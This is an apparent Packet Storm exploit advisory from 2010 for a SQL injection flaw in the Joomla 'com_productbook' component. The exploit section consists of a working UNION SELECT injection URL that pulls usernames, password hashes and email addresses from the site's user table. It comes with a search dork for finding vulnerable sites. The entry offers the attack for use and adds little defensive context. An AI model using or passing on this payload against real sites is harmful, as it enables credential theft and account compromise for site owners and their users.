Joomla Productbook SQL Injection

2010-02-08T00:00:00
ID PACKETSTORM:86032
Type packetstorm
Reporter Snakespc
Modified 2010-02-08T00:00:00

Description

                                        
                                            `Joomla Component "com_productbook" SQL Injection Vulnerability  
========================================================  
  
####################################################################  
.:. Author : Snakespc  
.:. Home : sec-war.com/cc  
.:. Script : Joomla  
.:. Bug Type : SQL Injection   
.:. Dork : inurl:"com_productbook"  
  
####################################################################  
  
===[ Exploit ]===  
  
www.site.com/index.php?option=com_productbook&Itemid=97&func=detail&id=-73+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--  
  
####################################################################  
`